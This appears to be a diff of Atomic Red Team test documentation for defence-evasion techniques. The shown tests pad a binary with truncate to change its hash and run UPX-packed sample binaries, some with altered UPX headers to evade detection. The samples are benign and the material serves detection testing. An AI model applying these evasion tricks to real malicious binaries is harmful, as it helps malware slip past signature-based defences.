## Atomic Test #2 - Pad Binary to Change Hash using truncate command - Linux/macOS
Uses truncate to add a byte to the binary to change the hash.
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `e22a9e89-69c7-410f-a473-e6c212cd2292`
#### Inputs
**auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
truncate -s +1 #{file_to_pad} #adds a byte to the file size
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm #{file_to_pad}
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: The binary must exist on disk at specified location (#{file_to_pad})
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
cp /bin/ls #{file_to_pad}
```
<br/>
atomics/T1027.002/T1027.002.md
+85 -33
View File
@@ -1,48 +1,65 @@
# T1027.002 - Obfuscated Files or Information: Software Packing
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1027/002)
<blockquote>
## Description from ATT&CK
Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
> Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018)
>
> Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)
[Source](https://attack.mitre.org/techniques/T1027/002)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Binary simply packed by UPX (linux)](#atomic-test-1-binary-simply-packed-by-upx-linux)
- [Atomic Test #2: Binary packed by UPX, with modified headers (linux)](#atomic-test-2-binary-packed-by-upx-with-modified-headers-linux)
- [Atomic Test #3: Binary simply packed by UPX](#atomic-test-3-binary-simply-packed-by-upx)
- [Atomic Test #4: Binary packed by UPX, with modified headers](#atomic-test-4-binary-packed-by-upx-with-modified-headers)
- [Atomic Test #1 - Binary simply packed by UPX (linux)](#atomic-test-1---binary-simply-packed-by-upx-linux)
### Atomic Test #1: Binary simply packed by UPX (linux)
- [Atomic Test #2 - Binary packed by UPX, with modified headers (linux)](#atomic-test-2---binary-packed-by-upx-with-modified-headers-linux)
- [Atomic Test #3 - Binary simply packed by UPX](#atomic-test-3---binary-simply-packed-by-upx)
- [Atomic Test #4 - Binary packed by UPX, with modified headers](#atomic-test-4---binary-packed-by-upx-with-modified-headers)
<br/>
## Atomic Test #1 - Binary simply packed by UPX (linux)
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** Linux
**auto_generated_guid:** `11c46cd8-e471-450e-acb8-52a1216ae6a4`
#### Inputs
**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
### Atomic Test #2: Binary packed by UPX, with modified headers (linux)
<br/>
<br/>
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux)
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
@@ -50,53 +67,77 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** Linux
**auto_generated_guid:** `f06197f8-ff46-48c2-a0c6-afc1b50665e1`
#### Inputs
**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
### Atomic Test #3: Binary simply packed by UPX
<br/>
<br/>
## Atomic Test #3 - Binary simply packed by UPX
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
No other protection/compression were applied.
**Supported Platforms:** macOS
**auto_generated_guid:** `b16ef901-00bb-4dda-b4fc-a04db5067e20`
#### Inputs
**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
### Atomic Test #4: Binary packed by UPX, with modified headers
<br/>
<br/>
## Atomic Test #4 - Binary packed by UPX, with modified headers
Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX.
The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected
@@ -104,22 +145,33 @@ by some methods, and especially UPX is not able to uncompress it any more.
**Supported Platforms:** macOS
**auto_generated_guid:** `4d46e16b-5765-4046-9f25-a600d3e65e4d`
#### Inputs
**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm /tmp/packed_bin
```
<br/>

Some files were not shown because too many files have changed in this diff Show More